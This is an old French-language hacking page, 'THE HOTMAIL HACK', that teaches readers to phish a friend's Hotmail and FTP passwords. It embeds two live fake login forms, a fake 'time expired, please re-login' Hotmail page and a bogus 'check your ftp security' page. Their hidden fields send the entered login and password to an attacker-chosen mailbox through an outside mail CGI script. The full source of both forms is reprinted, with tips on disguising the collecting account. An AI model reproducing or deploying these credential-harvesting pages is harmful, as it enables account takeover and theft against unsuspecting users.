<HTML>
<HEAD>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
   <META NAME="Author" CONTENT="Bill G.">
   <META NAME="GENERATOR" CONTENT="Mozilla/4.03 [fr] (Win95; I) [Netscape]">
   <TITLE>hothac.htm</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" LINK="#000099" VLINK="#000099">

<CENTER><FONT COLOR="#FF0000"><FONT SIZE=+2>THE HOTMAIL HACK</FONT></FONT></CENTER>


<P><B><U>Disclaimer:</U></B> Il est formellement interdit d'appliquer ce
qui est &eacute;crit ici, moi ou mon serveur ne POUVONS pas &ecirc;tre
tenus responsables de vos actes... Je vous aurais pr&eacute;venus.

<P><B><U>Comment faire:</U></B> pour pi&eacute;ger un de vos camarades
qui est pas trop m&eacute;fiant, envoyez lui ceci:
<BR>S'il y r&eacute;pond vous recevrez ses pass&nbsp; avec son login pour
Hotmail...
<BR>De plus la plupart des utilisateurs ont le m&ecirc;me pass pour leur
site et leur mail!
<BR>Bon... la partie rouge correspond &agrave; votre e-mail, cr&eacute;ez
un compte mail pas trop voyant (style: hotmail_staff@caramail.com), et
allez r&eacute;cup&eacute;rez les pass l&agrave;-bas. Vous devez mettre
ce qui est en bleu et rouge dans votre mail.
<TABLE BORDER=0 CELLSPACING=5 CELLPADDING=5 WIDTH="508" HEIGHT="90%" >
<TR VALIGN=CENTER>
<TH COLSPAN="2"><FONT FACE="Arial, Helvetica"><FONT SIZE=+2>We're Sorry,
We Cannot</FONT></FONT>&nbsp;
<BR><FONT FACE="Arial, Helvetica"><FONT SIZE=+2>Process Your Request</FONT></FONT>&nbsp;</TH>
</TR>

<TR VALIGN=CENTER>
<TD ALIGN=CENTER><FONT FACE="Arial, Helvetica"><FONT SIZE=+0>Reason:&nbsp;</FONT></FONT>
<B><FONT FACE="Arial, Helvetica"><FONT COLOR="#FF0000"><FONT SIZE=+0>Time
expired for your account. Please re-login.</FONT></FONT></FONT></B></TD>
</TR>

<TR VALIGN=CENTER>
<TD ALIGN=CENTER><FORM METHOD="POST" NAME="hotmail"
      ACTION="http://www.univox.com/cgi-bin/mail/Mail.cgi" 
target="_parent"><INPUT TYPE="hidden" NAME="recipient" 
VALUE="user_guest@hotmail.com"><INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password"><INPUT TYPE="hidden" NAME="return_link_url" 
VALUE="http://www.hotmail.com/cgi-bin/start/">
<TABLE BORDER=0 CELLSPACING=5 CELLPADDING=0 >
<TR>
<TD><FONT FACE="Arial, Helvetica"><FONT SIZE=-1>Login Name:</FONT></FONT>&nbsp;
<BR><INPUT 
      type="text" name="login" size="16" maxlength="16"></TD>

<TD><FONT FACE="Arial,
      Helvetica"><FONT SIZE=-1>Password:</FONT></FONT>&nbsp;
<BR><INPUT type="password" 
name="passwd"
      size="16" maxlength="16">&nbsp;<INPUT type="submit" 
value="Enter"></TD>
</TR>
</TABLE>
</FORM></TD>
</TR>

<TR VALIGN=CENTER>
<TH ALIGN=CENTER COLSPAN="2"><FONT FACE="Arial, Helvetica"><FONT SIZE=+0>Return
to <A HREF="http://www.hotmail.com" target="_parent">Hotmail's Homepage</A>.&nbsp;</FONT></FONT></TH>
</TR>
</TABLE>
<FONT COLOR="#000000"><FONT SIZE=-1>1996-1999. Hotmail&copy; all rights
reserved.</FONT></FONT>

<P>d'ailleurs en voici le code source:
<BR><FONT COLOR="#3333FF">&lt;html>&lt;head>&lt;/head></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;body bgcolor="#ffffff"
link="#000099" vlink="#000099"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;table border=0
cellpadding=5 cellspacing=5 width=508 height=90%></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr valign=middle>&lt;th
colspan=2></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;font face="Arial,
Helvetica" size="5">We're Sorry, We Cannot&lt;br></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Process Your Request&lt;/font></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/th>&lt;/tr></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr valign=middle>&lt;td
align=center></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;font face="Arial,
Helvetica" size="3">Reason:&amp;nbsp;&lt;/font></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;font face="Arial,
Helvetica" size="3" color="#ff0000">&lt;b>Time&nbsp; expired for your account.
Please</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; re-login.&lt;/b>&lt;/font>&lt;br></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/td>&lt;/tr></FONT>
<BR><FONT COLOR="#3333FF">&lt;tr valign="middle">&lt;td align="center"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;FORM METHOD="POST"
NAME="hotmail"</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ACTION="http://www.univox.com/cgi-bin/mail/Mail.cgi"</FONT>
<BR><FONT COLOR="#3333FF">target="_parent"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;INPUT TYPE="hidden"
NAME="recipient"</FONT>
<BR><FONT COLOR="#3333FF">VALUE="</FONT><FONT COLOR="#FF0000">user_guest@hotmail.com</FONT><FONT COLOR="#3333FF">"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;INPUT TYPE="hidden"
NAME="subject" VALUE="Hotmail Password"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;INPUT TYPE="hidden"
NAME="return_link_url"</FONT>
<BR><FONT COLOR="#3333FF">VALUE="http://www.hotmail.com/cgi-bin/start/"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;table cellpadding="0"
cellspacing="5" border="0"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr>&lt;td>&lt;font
face="Arial, Helvetica" size="2">Login</FONT>
<BR><FONT COLOR="#3333FF">Name:&lt;/font>&lt;br>&lt;input</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; type="text" name="login"
size="16" maxlength="16">&lt;/td>&lt;td>&lt;font</FONT>
<BR><FONT COLOR="#3333FF">face="Arial,</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Helvetica" size="2">Password:&lt;/font>&lt;br>&lt;input
type="password"</FONT>
<BR><FONT COLOR="#3333FF">name="passwd"</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; size="16" maxlength="16">&amp;nbsp;&lt;input
type="submit"</FONT>
<BR><FONT COLOR="#3333FF">value="Enter">&lt;/td>&lt;tr></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/table>&lt;/FORM>&lt;/td>&lt;/tr></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr valign=middle>&lt;th
colspan=2 align=center></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;font face="Arial,
Helvetica" size="3">Return to &lt;a</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; href="http://www.hotmail.com"</FONT>
<BR><FONT COLOR="#3333FF">target="_parent">Hotmail's Homepage&lt;/a>.</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/font>&lt;/th>&lt;/tr>&lt;/table></FONT>
<BR><FONT COLOR="#3333FF">&lt;font size=2 color=black>1996-1999. Hotmail&copy;
all rights reserved.&lt;/font></FONT>
<BR>&nbsp;
<BR>&nbsp;

<P>&nbsp;Apr&egrave;s quoi vous pouvez toujours faire la m&ecirc;me chose
en faisant croire &agrave; une v&eacute;rification du taux de s&eacute;curit&eacute;
du compte ftp de la victime: voici ce que &ccedil;a donne:
<BR>&nbsp;
<TABLE BORDER=0 CELLSPACING=5 CELLPADDING=5 WIDTH="508" HEIGHT="90%" >
<TR VALIGN=CENTER>
<TH COLSPAN="2"><FONT FACE="Arial, Helvetica"><FONT SIZE=+3>Check your
ftp security!</FONT></FONT></TH>
</TR>

<TR VALIGN=CENTER>
<TD ALIGN=CENTER><B><FONT FACE="Arial, Helvetica"><FONT COLOR="#FF0000"><FONT SIZE=+0>Write
in the blanks and confirm to know if your ftp account is protect. A mail
will be send you...&nbsp;</FONT></FONT></FONT></B></TD>
</TR>

<TR VALIGN=CENTER>
<TD ALIGN=CENTER><FORM METHOD="POST" NAME="hotmail" 
      ACTION="http://www.univox.com/cgi-bin/mail/Mail.cgi" 
target="_parent"><INPUT TYPE="hidden" NAME="recipient" 
VALUE="user_guest@hotmail.com"><INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password"><INPUT TYPE="hidden" NAME="return_link_url" 
VALUE="http://www.hotmail.com/cgi-bin/start/">
<TABLE BORDER=0 CELLSPACING=5 CELLPADDING=0 >
<TR>
<TD><FONT FACE="Arial, Helvetica"><FONT SIZE=-1>FTP server:</FONT></FONT>
<BR><INPUT 
      type="text" name="FTP server" size="16" maxlength="16"></TD>

<TD><FONT FACE="Arial, Helvetica"><FONT SIZE=-1>E-mail :</FONT></FONT>
<BR><INPUT 
      type="text" name="Mail from" size="16" maxlength="16"></TD>
</TR>

<TR>
<TD><FONT FACE="Arial, Helvetica"><FONT SIZE=-1>Login name :</FONT></FONT>
<BR><INPUT 
      type="text" name="login" size="16" maxlength="16"></TD>

<TD><FONT FACE="Arial, 
      Helvetica"><FONT SIZE=-1>Password:</FONT></FONT>
<BR><INPUT type="password" 
name="passwd" 
      size="16" maxlength="16">&nbsp;<INPUT type="submit" 
value="Enter"></TD>
</TR>
</TABLE>
</FORM></TD>
</TR>

<TR VALIGN=CENTER>
<TH ALIGN=CENTER COLSPAN="2"></TH>
</TR>
</TABLE>
<U><FONT COLOR="#000000"><FONT SIZE=-1>FTP is a protocol to transfer files.</FONT></FONT></U>

<P>Et voil&agrave; le code source:

<P><FONT COLOR="#3333FF">&lt;html>&lt;head>&lt;/head></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;body bgcolor="#ffffff"
link="#000099" vlink="#000099"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;table border=0
cellpadding=5 cellspacing=5 width=508 height=90%></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr valign=middle>&lt;th
colspan=2></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;font face="Arial,
Helvetica" size="6">Check your ftp security!&lt;br></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/font></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/th>&lt;/tr></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr valign=middle>&lt;td
align=center></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;font face="Arial,
Helvetica" size="3" color="#ff0000">&lt;b>Write in the blanks and confirm
to know if your ftp account is protect. A mail will be send you...</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/b>&lt;/font>&lt;br></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/td>&lt;/tr></FONT>
<BR><FONT COLOR="#3333FF">&lt;tr valign="middle">&lt;td align="center"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;FORM METHOD="POST"
NAME="hotmail"</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ACTION="http://www.univox.com/cgi-bin/mail/Mail.cgi"</FONT>
<BR><FONT COLOR="#3333FF">target="_parent"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;INPUT TYPE="hidden"
NAME="recipient"</FONT>
<BR><FONT COLOR="#3333FF">VALUE="</FONT><FONT COLOR="#FF0000">user_guest@hotmail.com</FONT><FONT COLOR="#3333FF">"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;INPUT TYPE="hidden"
NAME="subject" VALUE="Hotmail Password"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;INPUT TYPE="hidden"
NAME="return_link_url"</FONT>
<BR><FONT COLOR="#3333FF">VALUE="http://www.hotmail.com/cgi-bin/start/"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;table cellpadding="0"
cellspacing="5" border="0"></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr>&lt;td>&lt;font
face="Arial, Helvetica" size="2">FTP</FONT>
<BR><FONT COLOR="#3333FF">server:&lt;/font>&lt;br>&lt;input</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; type="text" name="FTP
server" size="16" maxlength="16">&lt;/td></FONT>
<BR><FONT COLOR="#3333FF">&lt;td>&lt;font face="Arial, Helvetica" size="2">E-mail</FONT>
<BR><FONT COLOR="#3333FF">:&lt;/font>&lt;br>&lt;input</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; type="text" name="Mail
from" size="16" maxlength="16">&lt;/td></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr>&lt;td>&lt;font
face="Arial, Helvetica" size="2">Login name</FONT>
<BR><FONT COLOR="#3333FF">:&lt;/font>&lt;br>&lt;input</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; type="text" name="login"
size="16" maxlength="16">&lt;/td>&lt;td>&lt;font</FONT>
<BR><FONT COLOR="#3333FF">face="Arial,</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Helvetica" size="2">Password:&lt;/font>&lt;br>&lt;input
type="password"</FONT>
<BR><FONT COLOR="#3333FF">name="passwd"</FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; size="16" maxlength="16">&amp;nbsp;&lt;input
type="submit"</FONT>
<BR><FONT COLOR="#3333FF">value="Enter">&lt;/td>&lt;tr></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/table>&lt;/FORM>&lt;/td>&lt;/tr></FONT>
<BR><FONT COLOR="#3333FF">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr valign=middle>&lt;th
colspan=2 align=center></FONT>
<BR><FONT COLOR="#3333FF">&lt;/table></FONT>
<BR><FONT COLOR="#3333FF">&lt;font size=2 color=black>&lt;u>FTP is
a protocol to transfer files.&lt;/u>&lt;/font></FONT>
</BODY>
</HTML>
